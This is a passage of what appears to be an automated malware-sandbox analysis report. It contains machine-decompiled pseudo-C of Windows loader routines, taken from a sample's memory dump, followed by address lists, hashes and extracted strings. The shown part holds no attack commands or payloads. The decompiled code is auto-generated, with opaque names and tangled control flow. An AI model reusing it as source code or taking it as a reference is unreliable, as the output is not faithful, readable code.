															_t420 = _v644;
															_t318 =  *(_t420 + 0x28);
															__eflags = _t318;
															if(_t318 != 0) {
																_t318 = _t318 + _v588;
																__eflags = _t318;
															}
															 *(_t427 + 0x1c) = _t318;
															 *(_t427 + 0x80) =  *(_t420 + 0x34);
															 *((intOrPtr*)(_t427 + 0x50)) = _t427 + 0xa8;
															E1D788F40(_t427 + 0xa8, 0, 0x2c);
															_t432 = _t431 + 0xc;
															_t386 = _t427 + 0xa8;
															_t322 = _t427 + 0x54;
															 *_t322 = _t386;
															 *((intOrPtr*)(_t322 + 4)) = _t386;
															 *_t386 = _t322;
															_t406 = 2;
															 *((intOrPtr*)(_t386 + 4)) = _t322;
															 *(_t427 + 0x9c) = _t406;
															 *(_t386 + 0xc) =  *(_t386 + 0xc) | 0xffffffff;
															_push(0);
															_push(4);
															 *((short*)( *_t386 - 0x1c)) = 0xffff;
															_push( &_v656);
															_push(_t406);
															_push(_v596);
															_t325 = E1D782EC0();
															__eflags = _t325;
															if(_t325 >= 0) {
																_t326 = _v656;
																__eflags = _t326;
																if(_t326 != 0) {
																	_t144 = _t427 + 0x80;
																	 *_t144 =  *(_t427 + 0x80) - _t326;
																	__eflags =  *_t144;
																}
																__eflags =  *(_t420 + 0x16) & 0x00002000;
																if(( *(_t420 + 0x16) & 0x00002000) != 0) {
																	_t149 = _t427 + 0x34;
																	 *_t149 =  *(_t427 + 0x34) | 0x00000004;
																	__eflags =  *_t149;
																}
																_t417 = 0;
																__eflags =  *(_t427 + 0x34) & 0x00000004;
																if(__eflags == 0) {
																	 *(_t427 + 0x1c) = 0;
																}
																__eflags = E1D74DE20(0xffff, __eflags,  *(_t427 + 0x18), 1, 9,  &_v660);
																if(__eflags == 0) {
																	L39:
																	_t406 = E1D74DE20(0xffff, __eflags,  *(_t427 + 0x18), 1, 1,  &_v764);
																	__eflags = _t406;
																	if(_t406 == 0) {
																		goto L38;
																	} else {
																		_t422 =  *(_t427 + 0x18) +  *_t406;
																		_v592 =  *((intOrPtr*)(_t406 + 0x10)) +  *(_t427 + 0x18);
																		__eflags =  *_t422;
																		if( *_t422 == 0) {
																			L50:
																			_t388 =  *(_t427 + 0x34);
																			_t417 = 0;
																			__eflags = (_t388 & 0x00002004) - 4;
																			if((_t388 & 0x00002004) != 4) {
																				L53:
																				__eflags = _t388 & 0x00000200;
																				if(__eflags == 0) {
																					E1D749D4A(_v588,  *((intOrPtr*)(_t427 + 0x20)), __eflags);
																					_t194 = _t427 + 0x34;
																					 *_t194 =  *(_t427 + 0x34) | 0x00000200;
																					__eflags =  *_t194;
																				}
																				_t406 =  *(_t427 + 0x18);
																				_v744 = _v664;
																				_v716 = _v668;
																				_v712 = _v648;
																				_v616 =  &_v760;
																				_push( &_v616);
																				_push(5);
																				_v760 = 0x4c;
																				_v756 = 0x1d7f9300;
																				_v708 = E1D73FCF0;
																				_v752 = E1D7C89A0;
																				_v748 = 0x1d7f8fe0;
																				_v704 = 0x1d7f9000;
																				_v700 = E1D7F9050;
																				_v696 = E1D7F9020;
																				_v692 = E1D7F91F0;
																				_v688 = E1D7F9240;
																				_v740 = E1D7C6900;
																				_v736 = E1D7C7650;
																				_v732 = E1D779730;
																				_v728 = _t417;
																				_v724 = _t417;
																				_v720 = _t417;
																				_t342 = E1D75DCD1(_t378,  *(_t427 + 0x1c),  *(_t427 + 0x18), _t417, _t427, __eflags);
																				__eflags = _t342;
																				if(_t342 != 0) {
																					__eflags = _v616 -  &_v760;
																					if(_v616 !=  &_v760) {
																						goto L56;
																					} else {
																						_t406 = _v720;
																						__eflags = _t406;
																						if(_t406 == 0) {
																							goto L56;
																						} else {
																							__eflags =  *_t406 - 0x2c;
																							if( *_t406 != 0x2c) {
																								goto L56;
																							} else {
																								_t344 = _v724;
																								__eflags = _t344;
																								if(_t344 == 0) {
																									goto L56;
																								} else {
																									__eflags =  *_t344 - 0x58;
																									if( *_t344 != 0x58) {
																										goto L56;
																									} else {
																										_t390 = 0x16;
																										_t346 = memcpy(0x1d833744, _t344, _t390 << 2);
																										_t427 = _v600;
																										 *0x1d833738 = _t346;
																										_t347 =  *0x1d835a74; // 0x0
																										 *((intOrPtr*)(_t406 + 0x14)) = _t347;
																										_t348 =  *0x1d8369dc; // 0x0
																										 *((intOrPtr*)(_t406 + 0x18)) = _t348;
																										E1D7607F5(_t427);
																										_t406 = _t427 + 0x24;
																										_t417 = 0;
																										_v588 = 0;
																										E1D75DF36( *(_t427 + 0x18), _t427 + 0x24, 0x14ae);
																										 *((intOrPtr*)(_t427 + 0xc8)) = 9;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					L56:
																					_t378 = 0xc0000142;
																				}
																			} else {
																				_v592 = 0;
																				E1D749F1A( *(_t427 + 0x18),  *((intOrPtr*)(_t427 + 0x20)), _t427, 0, E1D76088D() ^  *0x1d8392e0,  &_v592);
																				_t406 = _v644;
																				_t378 = E1D75FED0(_t427, _v644, _v592);
																				__eflags = _t378;
																				if(_t378 >= 0) {
																					_t187 = _t427 + 0x34;
																					 *_t187 =  *(_t427 + 0x34) | 0x00002000;
																					__eflags =  *_t187;
																					_t388 =  *(_t427 + 0x34);
																					goto L53;
																				}
																			}
																		} else {
																			E1D788F40( &_v912, 0, 0x6c);
																			_t432 = _t432 + 0xc;
																			_v880 = _t427;
																			_t378 = E1D749C41( &_v912, __eflags);
																			__eflags = _t378;
																			if(_t378 < 0) {
																				goto L64;
																			} else {
																				__eflags = _v852;
																				if(_v852 == 0) {
																					goto L17;
																				} else {
																					_t360 =  *_t422;
																					_t399 = _v592 - _t422;
																					__eflags = _t399;
																					_v592 = _t399;
																					while(1) {
																						_t406 =  *(_t427 + 0x18) + _t360 + 2;
																						_t378 = E1D7362A0(_v648,  *(_t427 + 0x18) + _t360 + 2, __eflags, 0, _t399 + _t422);
																						__eflags = _t378;
																						if(_t378 < 0) {
																							goto L64;
																						}
																						_t422 =  &(_t422[1]);
																						_t360 =  *_t422;
																						__eflags = _t360;
																						if(__eflags == 0) {
																							_push( &_v768);
																							_push(_v832);
																							_push( &_v848);
																							_push( &_v852);
																							_push(0xffffffff);
																							E1D782EB0();
																							_t367 = E1D7600DD();
																							_t417 = 0;
																							__eflags = _t367;
																							if(_t367 != 0) {
																								_t406 = 0;
																								__eflags = 0;
																								_t378 = E1D7C46E2( *((intOrPtr*)(_v880 + 0x18)), 0, 0);
																							}
																							__eflags = _t378;
																							if(_t378 >= 0) {
																								goto L50;
																							}
																						} else {
																							_t399 = _v592;
																							continue;
																						}
																						goto L65;
																					}
																					goto L64;
																				}
																			}
																		}
																	}
																} else {
																	__eflags = _v660;
																	if(__eflags <= 0) {
																		goto L39;
																	} else {
																		_push("AVRF: Verifier .dlls must not have thread locals\n");
																		_push(_t417);
																		_push(0x5d);
																		E1D7CEF10();
																		asm("int3");
																		L38:
																		_t378 = 0xc000007b;
																	}
																}
															} else {
																_t378 = _t325;
																goto L64;
															}
															goto L65;
														}
														__eflags = _t315 -  *_t411;
														if(_t315 !=  *_t411) {
															 *(_t427 + 0x2c) =  *(_t427 + 0x24);
															 *((intOrPtr*)(_t427 + 0x30)) = _t419;
														} else {
															goto L23;
														}
														goto L25;
													} else {
														L17:
														_t378 = 0xc000007b;
														L64:
														_t417 = 0;
														__eflags = 0;
													}
												}
											}
										} else {
											__eflags = _t378 - 0xc0000034;
											if(_t378 == 0xc0000034) {
												goto L10;
											}
										}
									} else {
										L10:
										_t378 = 0xc0000135;
									}
								}
							}
						}
					}
				}
				L65:
				if(_v588 != 0) {
					_push(_v588);
					_push(0xffffffff);
					E1D782C50();
					 *(_t427 + 0x18) = _t417;
				}
				if(_v604 != 0) {
					_push(_v604);
					E1D782A80();
				}
				if(_v596 != 0) {
					_push(_v596);
					E1D782A80();
				}
				if(_v608 != 0) {
					_push(_v608);
					E1D782A80();
				}
				if(_v612 != 0) {
					_push(_v612);
					E1D782A80();
				}
				return E1D784B50(_t378, _t378, _v12 ^ _t430, _t406, _t417, _t427);
			}
















































































































                                                                                                                              0x1d7c98b2
                                                                                                                              0x1d7c98c4
                                                                                                                              0x1d7c98cc
                                                                                                                              0x1d7c98d0
                                                                                                                              0x1d7c98d6
                                                                                                                              0x1d7c98db
                                                                                                                              0x1d7c98ed
                                                                                                                              0x1d7c98f3
                                                                                                                              0x1d7c98f9
                                                                                                                              0x1d7c98ff
                                                                                                                              0x1d7c9905
                                                                                                                              0x1d7c990b
                                                                                                                              0x1d7c9911
                                                                                                                              0x1d7c9917
                                                                                                                              0x1d7c991d
                                                                                                                              0x1d7c9923
                                                                                                                              0x1d7c992e
                                                                                                                              0x1d7c9938
                                                                                                                              0x1d7c9944
                                                                                                                              0x1d7c9945
                                                                                                                              0x1d7c994d
                                                                                                                              0x1d7c9953
                                                                                                                              0x1d7c9954
                                                                                                                              0x1d7c995e
                                                                                                                              0x1d7c9964
                                                                                                                              0x1d7c996a
                                                                                                                              0x1d7c996f
                                                                                                                              0x1d7c9973
                                                                                                                              0x1d7c9985
                                                                                                                              0x1d7c9990
                                                                                                                              0x1d7c999c
                                                                                                                              0x1d7c99a8
                                                                                                                              0x1d7c99a9
                                                                                                                              0x1d7c99b1
                                                                                                                              0x1d7c99bb
                                                                                                                              0x1d7c99bc
                                                                                                                              0x1d7c99c6
                                                                                                                              0x1d7c99cc
                                                                                                                              0x1d7c99d2
                                                                                                                              0x1d7c99d7
                                                                                                                              0x1d7c99db
                                                                                                                              0x1d7c99e3
                                                                                                                              0x1d7c99e6
                                                                                                                              0x1d7c99e7
                                                                                                                              0x1d7c99ee
                                                                                                                              0x1d7c99fb
                                                                                                                              0x1d7c9a07
                                                                                                                              0x1d7c9a08
                                                                                                                              0x1d7c9a09
                                                                                                                              0x1d7c9a0f
                                                                                                                              0x1d7c9a16
                                                                                                                              0x1d7c9a1d
                                                                                                                              0x1d7c9a27
                                                                                                                              0x1d7c9a2c
                                                                                                                              0x1d7c9a30
                                                                                                                              0x1d7c9a3e
                                                                                                                              0x1d7c9a44
                                                                                                                              0x1d7c9a45
                                                                                                                              0x1d7c9a4c
                                                                                                                              0x1d7c9a5f
                                                                                                                              0x1d7c9a72
                                                                                                                              0x1d7c9a77
                                                                                                                              0x1d7c9a7b
                                                                                                                              0x1d7c9a8d
                                                                                                                              0x1d7c9a92
                                                                                                                              0x1d7c9a96
                                                                                                                              0x1d7c9aa9
                                                                                                                              0x1d7c9ab1
                                                                                                                              0x1d7c9ab2
                                                                                                                              0x1d7c9ab3
                                                                                                                              0x1d7c9abf
                                                                                                                              0x1d7c9ac0
                                                                                                                              0x1d7c9acc
                                                                                                                              0x1d7c9ace
                                                                                                                              0x1d7c9acf
                                                                                                                              0x1d7c9ad1
                                                                                                                              0x1d7c9ad1
                                                                                                                              0x1d7c9adc
                                                                                                                              0x1d7c9ae6
                                                                                                                              0x1d7c9af2
                                                                                                                              0x1d7c9af9
                                                                                                                              0x1d7c9aff
                                                                                                                              0x1d7c9b00
                                                                                                                              0x1d7c9b0a
                                                                                                                              0x1d7c9b10
                                                                                                                              0x1d7c9b16
                                                                                                                              0x1d7c9b1d
                                                                                                                              0x1d7c9b37
                                                                                                                              0x1d7c9b39
                                                                                                                              0x1d7c9b41
                                                                                                                              0x1d7c9b48
                                                                                                                              0x1d7c9b49
                                                                                                                              0x1d7c9b54
                                                                                                                              0x1d7c9b5a
                                                                                                                              0x1d7c9b5c
                                                                                                                              0x1d7c9b5e
                                                                                                                              0x1d7c9b6e
                                                                                                                              0x1d7c9b7a
                                                                                                                              0x1d7c9b7f
                                                                                                                              0x1d7c9b81
                                                                                                                              0x1d7c9b82
                                                                                                                              0x1d7c9b83
                                                                                                                              0x1d7c9b85
                                                                                                                              0x1d7c9b8b
                                                                                                                              0x1d7c9b8d
                                                                                                                              0x1d7c9b8f
                                                                                                                              0x1d7c9b97
                                                                                                                              0x1d7c9b9d
                                                                                                                              0x1d7c9ba5
                                                                                                                              0x1d7c9bb2
                                                                                                                              0x1d7c9bbe
                                                                                                                              0x1d7c9bc9
                                                                                                                              0x1d7c9bd0
                                                                                                                              0x1d7c9bdf
                                                                                                                              0x1d7c9be4
                                                                                                                              0x1d7c9bf1
                                                                                                                              0x1d7c9bf3
                                                                                                                              0x1d7c9bfb
                                                                                                                              0x1d7c9bfd
                                                                                                                              0x1d7c9c06
                                                                                                                              0x1d7c9c09
                                                                                                                              0x1d7c9c0a
                                                                                                                              0x1d7c9c0b
                                                                                                                              0x1d7c9c12
                                                                                                                              0x1d7c9c13
                                                                                                                              0x1d7c9c15
                                                                                                                              0x1d7c9c20
                                                                                                                              0x1d7c9c25
                                                                                                                              0x1d7c9c27
                                                                                                                              0x1d7ca0a6
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9c2d
                                                                                                                              0x1d7c9c33
                                                                                                                              0x1d7c9c38
                                                                                                                              0x1d7c9c3e
                                                                                                                              0x1d7c9c40
                                                                                                                              0x1d7c9c46
                                                                                                                              0x1d7c9c48
                                                                                                                              0x1d7c9c5a
                                                                                                                              0x1d7c9c5d
                                                                                                                              0x1d7c9c63
                                                                                                                              0x1d7c9c69
                                                                                                                              0x1d7c9c6f
                                                                                                                              0x1d7c9c73
                                                                                                                              0x1d7c9c78
                                                                                                                              0x1d7c9c7d
                                                                                                                              0x1d7c9c81
                                                                                                                              0x1d7c9c84
                                                                                                                              0x1d7c9c87
                                                                                                                              0x1d7c9c92
                                                                                                                              0x1d7c9c92
                                                                                                                              0x1d7c9c95
                                                                                                                              0x1d7c9c96
                                                                                                                              0x1d7c9c99
                                                                                                                              0x1d7c9c99
                                                                                                                              0x1d7c9c9b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9c9d
                                                                                                                              0x1d7c9ca0
                                                                                                                              0x1d7c9cac
                                                                                                                              0x1d7c9cac
                                                                                                                              0x1d7c9cb1
                                                                                                                              0x1d7c9cbc
                                                                                                                              0x1d7c9cc4
                                                                                                                              0x1d7c9ccf
                                                                                                                              0x1d7c9ca2
                                                                                                                              0x1d7c9ca2
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9ca2
                                                                                                                              0x1d7c9ce0
                                                                                                                              0x1d7c9ce0
                                                                                                                              0x1d7c9ce6
                                                                                                                              0x1d7c9ce9
                                                                                                                              0x1d7c9ceb
                                                                                                                              0x1d7c9ced
                                                                                                                              0x1d7c9ced
                                                                                                                              0x1d7c9ced
                                                                                                                              0x1d7c9cf3
                                                                                                                              0x1d7c9cfb
                                                                                                                              0x1d7c9d0a
                                                                                                                              0x1d7c9d0d
                                                                                                                              0x1d7c9d12
                                                                                                                              0x1d7c9d15
                                                                                                                              0x1d7c9d1b
                                                                                                                              0x1d7c9d1e
                                                                                                                              0x1d7c9d20
                                                                                                                              0x1d7c9d23
                                                                                                                              0x1d7c9d27
                                                                                                                              0x1d7c9d28
                                                                                                                              0x1d7c9d2b
                                                                                                                              0x1d7c9d33
                                                                                                                              0x1d7c9d3c
                                                                                                                              0x1d7c9d3e
                                                                                                                              0x1d7c9d40
                                                                                                                              0x1d7c9d4a
                                                                                                                              0x1d7c9d4b
                                                                                                                              0x1d7c9d4c
                                                                                                                              0x1d7c9d52
                                                                                                                              0x1d7c9d57
                                                                                                                              0x1d7c9d59
                                                                                                                              0x1d7c9d62
                                                                                                                              0x1d7c9d68
                                                                                                                              0x1d7c9d6a
                                                                                                                              0x1d7c9d6c
                                                                                                                              0x1d7c9d6c
                                                                                                                              0x1d7c9d6c
                                                                                                                              0x1d7c9d6c
                                                                                                                              0x1d7c9d77
                                                                                                                              0x1d7c9d7b
                                                                                                                              0x1d7c9d7d
                                                                                                                              0x1d7c9d7d
                                                                                                                              0x1d7c9d7d
                                                                                                                              0x1d7c9d7d
                                                                                                                              0x1d7c9d84
                                                                                                                              0x1d7c9d86
                                                                                                                              0x1d7c9d88
                                                                                                                              0x1d7c9d8a
                                                                                                                              0x1d7c9d8a
                                                                                                                              0x1d7c9da0
                                                                                                                              0x1d7c9da2
                                                                                                                              0x1d7c9dc8
                                                                                                                              0x1d7c9ddb
                                                                                                                              0x1d7c9ddd
                                                                                                                              0x1d7c9ddf
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9de1
                                                                                                                              0x1d7c9de3
                                                                                                                              0x1d7c9dec
                                                                                                                              0x1d7c9df2
                                                                                                                              0x1d7c9df5
                                                                                                                              0x1d7c9ec2
                                                                                                                              0x1d7c9ec2
                                                                                                                              0x1d7c9ec5
                                                                                                                              0x1d7c9ece
                                                                                                                              0x1d7c9ed1
                                                                                                                              0x1d7c9f1f
                                                                                                                              0x1d7c9f1f
                                                                                                                              0x1d7c9f25
                                                                                                                              0x1d7c9f30
                                                                                                                              0x1d7c9f35
                                                                                                                              0x1d7c9f35
                                                                                                                              0x1d7c9f35
                                                                                                                              0x1d7c9f35
                                                                                                                              0x1d7c9f42
                                                                                                                              0x1d7c9f48
                                                                                                                              0x1d7c9f54
                                                                                                                              0x1d7c9f60
                                                                                                                              0x1d7c9f6c
                                                                                                                              0x1d7c9f78
                                                                                                                              0x1d7c9f79
                                                                                                                              0x1d7c9f7b
                                                                                                                              0x1d7c9f85
                                                                                                                              0x1d7c9f8f
                                                                                                                              0x1d7c9f99
                                                                                                                              0x1d7c9fa3
                                                                                                                              0x1d7c9fad
                                                                                                                              0x1d7c9fb7
                                                                                                                              0x1d7c9fc1
                                                                                                                              0x1d7c9fcb
                                                                                                                              0x1d7c9fd5
                                                                                                                              0x1d7c9fdf
                                                                                                                              0x1d7c9fe9
                                                                                                                              0x1d7c9ff3
                                                                                                                              0x1d7c9ffd
                                                                                                                              0x1d7ca003
                                                                                                                              0x1d7ca009
                                                                                                                              0x1d7ca00f
                                                                                                                              0x1d7ca014
                                                                                                                              0x1d7ca016
                                                                                                                              0x1d7ca028
                                                                                                                              0x1d7ca02e
                                                                                                                              0x00000000
                                                                                                                              0x1d7ca030
                                                                                                                              0x1d7ca030
                                                                                                                              0x1d7ca036
                                                                                                                              0x1d7ca038
                                                                                                                              0x00000000
                                                                                                                              0x1d7ca03a
                                                                                                                              0x1d7ca03a
                                                                                                                              0x1d7ca03d
                                                                                                                              0x00000000
                                                                                                                              0x1d7ca03f
                                                                                                                              0x1d7ca03f
                                                                                                                              0x1d7ca045
                                                                                                                              0x1d7ca047
                                                                                                                              0x00000000
                                                                                                                              0x1d7ca049
                                                                                                                              0x1d7ca049
                                                                                                                              0x1d7ca04c
                                                                                                                              0x00000000
                                                                                                                              0x1d7ca04e
                                                                                                                              0x1d7ca05d
                                                                                                                              0x1d7ca05e
                                                                                                                              0x1d7ca060
                                                                                                                              0x1d7ca068
                                                                                                                              0x1d7ca06d
                                                                                                                              0x1d7ca072
                                                                                                                              0x1d7ca075
                                                                                                                              0x1d7ca07a
                                                                                                                              0x1d7ca07d
                                                                                                                              0x1d7ca085
                                                                                                                              0x1d7ca088
                                                                                                                              0x1d7ca08f
                                                                                                                              0x1d7ca095
                                                                                                                              0x1d7ca09a
                                                                                                                              0x1d7ca09a
                                                                                                                              0x1d7ca04c
                                                                                                                              0x1d7ca047
                                                                                                                              0x1d7ca03d
                                                                                                                              0x1d7ca038
                                                                                                                              0x1d7ca018
                                                                                                                              0x1d7ca018
                                                                                                                              0x1d7ca018
                                                                                                                              0x1d7ca018
                                                                                                                              0x1d7c9ed3
                                                                                                                              0x1d7c9ed9
                                                                                                                              0x1d7c9ef3
                                                                                                                              0x1d7c9efe
                                                                                                                              0x1d7c9f0b
                                                                                                                              0x1d7c9f0d
                                                                                                                              0x1d7c9f0f
                                                                                                                              0x1d7c9f15
                                                                                                                              0x1d7c9f15
                                                                                                                              0x1d7c9f15
                                                                                                                              0x1d7c9f1c
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9f1c
                                                                                                                              0x1d7c9f0f
                                                                                                                              0x1d7c9dfb
                                                                                                                              0x1d7c9e06
                                                                                                                              0x1d7c9e0b
                                                                                                                              0x1d7c9e0e
                                                                                                                              0x1d7c9e1f
                                                                                                                              0x1d7c9e21
                                                                                                                              0x1d7c9e23
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9e29
                                                                                                                              0x1d7c9e29
                                                                                                                              0x1d7c9e30
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9e36
                                                                                                                              0x1d7c9e3c
                                                                                                                              0x1d7c9e3e
                                                                                                                              0x1d7c9e3e
                                                                                                                              0x1d7c9e40
                                                                                                                              0x1d7c9e46
                                                                                                                              0x1d7c9e54
                                                                                                                              0x1d7c9e5f
                                                                                                                              0x1d7c9e61
                                                                                                                              0x1d7c9e63
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9e69
                                                                                                                              0x1d7c9e6c
                                                                                                                              0x1d7c9e6e
                                                                                                                              0x1d7c9e70
                                                                                                                              0x1d7c9e80
                                                                                                                              0x1d7c9e81
                                                                                                                              0x1d7c9e8d
                                                                                                                              0x1d7c9e94
                                                                                                                              0x1d7c9e95
                                                                                                                              0x1d7c9e97
                                                                                                                              0x1d7c9e9c
                                                                                                                              0x1d7c9ea1
                                                                                                                              0x1d7c9ea3
                                                                                                                              0x1d7c9ea5
                                                                                                                              0x1d7c9ead
                                                                                                                              0x1d7c9ead
                                                                                                                              0x1d7c9eb8
                                                                                                                              0x1d7c9eb8
                                                                                                                              0x1d7c9eba
                                                                                                                              0x1d7c9ebc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9e72
                                                                                                                              0x1d7c9e72
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9e72
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9e70
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9e46
                                                                                                                              0x1d7c9e30
                                                                                                                              0x1d7c9e23
                                                                                                                              0x1d7c9df5
                                                                                                                              0x1d7c9da4
                                                                                                                              0x1d7c9da4
                                                                                                                              0x1d7c9dab
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9dad
                                                                                                                              0x1d7c9dad
                                                                                                                              0x1d7c9db2
                                                                                                                              0x1d7c9db3
                                                                                                                              0x1d7c9db5
                                                                                                                              0x1d7c9dbd
                                                                                                                              0x1d7c9dbe
                                                                                                                              0x1d7c9dbe
                                                                                                                              0x1d7c9dbe
                                                                                                                              0x1d7c9dab
                                                                                                                              0x1d7c9d5b
                                                                                                                              0x1d7c9d5b
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9d5b
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9d59
                                                                                                                              0x1d7c9ca7
                                                                                                                              0x1d7c9caa
                                                                                                                              0x1d7c9cd8
                                                                                                                              0x1d7c9cdd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9c4a
                                                                                                                              0x1d7c9c4a
                                                                                                                              0x1d7c9c4a
                                                                                                                              0x1d7ca0ac
                                                                                                                              0x1d7ca0ac
                                                                                                                              0x1d7ca0ac
                                                                                                                              0x1d7ca0ac
                                                                                                                              0x1d7c9c48
                                                                                                                              0x1d7c9c27
                                                                                                                              0x1d7c9b60
                                                                                                                              0x1d7c9b60
                                                                                                                              0x1d7c9b66
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9b6c
                                                                                                                              0x1d7c9b66
                                                                                                                              0x1d7c9b2d
                                                                                                                              0x1d7c9b2d
                                                                                                                              0x1d7c9b2d
                                                                                                                              0x1d7c9b2d
                                                                                                                              0x1d7c9b1d
                                                                                                                              0x1d7c9a96
                                                                                                                              0x1d7c9a7b
                                                                                                                              0x1d7c9a30
                                                                                                                              0x1d7c99db
                                                                                                                              0x1d7ca0ae
                                                                                                                              0x1d7ca0b5
                                                                                                                              0x1d7ca0b7
                                                                                                                              0x1d7ca0bd
                                                                                                                              0x1d7ca0bf
                                                                                                                              0x1d7ca0c4
                                                                                                                              0x1d7ca0c4
                                                                                                                              0x1d7ca0ce
                                                                                                                              0x1d7ca0d0
                                                                                                                              0x1d7ca0d6
                                                                                                                              0x1d7ca0d6
                                                                                                                              0x1d7ca0e2
                                                                                                                              0x1d7ca0e4
                                                                                                                              0x1d7ca0ea
                                                                                                                              0x1d7ca0ea
                                                                                                                              0x1d7ca0f6
                                                                                                                              0x1d7ca0f8
                                                                                                                              0x1d7ca0fe
                                                                                                                              0x1d7ca0fe
                                                                                                                              0x1d7ca10a
                                                                                                                              0x1d7ca10c
                                                                                                                              0x1d7ca112
                                                                                                                              0x1d7ca112
                                                                                                                              0x1d7ca127

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                              • API String ID: 3446177414-3127649145
                                                                                                                              • Opcode ID: a615e8dae318d27b03abcb0cddd48da1b0dc3ca29df87c04132a084a09dd9e68
                                                                                                                              • Instruction ID: 052f741abe5ee3cc65ec1b945b3178f70f7408913f5b689cc6c093025ef2a830
                                                                                                                              • Opcode Fuzzy Hash: a615e8dae318d27b03abcb0cddd48da1b0dc3ca29df87c04132a084a09dd9e68
                                                                                                                              • Instruction Fuzzy Hash: 29325A74A0172A9FDB61DF64CC88B9AB7F8FF44311F1041AAD50DA7250EB71AA84CF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D759870 Relevance: 6.7, Strings: 5, Instructions: 462COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E1D759870(signed char _a4, signed char* _a8, signed char* _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, signed int _a28, intOrPtr* _a32, intOrPtr* _a36) {
				signed int _v8;
				char _v140;
				short _v172;
				char _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v192;
				signed int _v196;
				signed int _v200;
				short* _v204;
				short* _v208;
				short* _v212;
				signed int _v214;
				char _v216;
				short _v224;
				short _v228;
				short* _v232;
				signed short* _v236;
				signed short* _v240;
				short _v242;
				char _v244;
				signed int _v260;
				signed short* _v264;
				char _v268;
				char* _v272;
				char _v276;
				char _v280;
				char _v284;
				signed int _v288;
				intOrPtr* _v292;
				intOrPtr _v296;
				intOrPtr _v298;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed short _v312;
				char _v316;
				signed int _v320;
				signed short _v324;
				signed short* _v328;
				intOrPtr _v330;
				signed int _v332;
				void* _v333;
				char _v334;
				void* _v340;
				void* _v344;
				void* _v348;
				void* _v349;
				void* _v350;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t185;
				signed short* _t186;
				char* _t188;
				intOrPtr _t190;
				signed short* _t193;
				short* _t194;
				intOrPtr _t200;
				short* _t201;
				signed short* _t211;
				char _t232;
				signed int _t233;
				signed short* _t240;
				signed int _t241;
				signed int _t244;
				short* _t255;
				intOrPtr _t262;
				void* _t263;
				signed int _t269;
				intOrPtr* _t273;
				void* _t274;
				intOrPtr* _t275;
				intOrPtr* _t277;
				void* _t278;
				void* _t279;
				signed short* _t280;
				void* _t281;
				signed int _t283;
				signed int _t285;

				_t285 = (_t283 & 0xfffffff8) - 0x14c;
				_v8 =  *0x1d83b370 ^ _t285;
				_t270 = _a28;
				_t266 = _a8;
				_t185 = _a36;
				_v288 = _t270;
				_v316 = 0;
				_v312 = 0;
				_t277 = _a32;
				_v272 =  &_v140;
				_v292 = _t277;
				_v276 = 0x800000;
				_v280 = 0;
				_v324 = 0;
				_v304 = 0;
				_t273 = _a20;
				if(_t270 != 0) {
					 *_t270 = 0;
				}
				if(_t277 != 0) {
					 *_t277 = 0;
				}
				if(_t185 != 0) {
					 *_t185 = 0x208;
				}
				if(_t273 != 0) {
					 *_t273 = 0;
					 *((intOrPtr*)(_t273 + 4)) = 0;
				}
				_t262 = _a16;
				_t186 =  &_v172;
				_v236 = _t186;
				_v232 = _t186;
				_v240 = _t186;
				_v228 = 0x20;
				_v224 = 0x20;
				_v172 = 0;
				_v244 = 0x200000;
				if(_t262 == 0) {
					_t188 =  &_v192;
					_v200 = 2;
					_v208 = _t188;
					_v204 = _t188;
					_v212 = _t188;
					_v196 = 2;
					_v192 = 0;
					_v216 = 0x20000;
				} else {
					_t255 =  *((intOrPtr*)(_t262 + 4));
					if(( *(_t262 + 2) & 0x0000ffff) < 2) {
						_t255 =  &_v192;
						_t270 = 2;
					}
					_v208 = _t255;
					_v200 = _t270;
					_v204 = _t255;
					_v196 = _t270;
					_v212 = _t255;
					if(_t255 != 0) {
						 *_t255 = 0;
						_t277 = _v292;
					}
					_v214 = _t270;
					_v216 = 0;
				}
				_t190 = _a24;
				_v188 = _t262;
				_v184 = _t273;
				_v180 = _t190;
				_v176 = 1;
				if((_a4 & 0xfffffffe) != 0) {
					_t278 = 0xc000000d;
					goto L82;
				} else {
					if(_t266 == 0) {
						_t278 = 0xc000000d;
						L82:
						if(_t278 >= 0) {
							L57:
							_t191 = _v312;
							if(_v312 != 0) {
								E1D73BA80(_t191);
								_v320 = 0;
								_v316 = 0;
							}
							_t193 = _v236;
							if(_t193 != 0) {
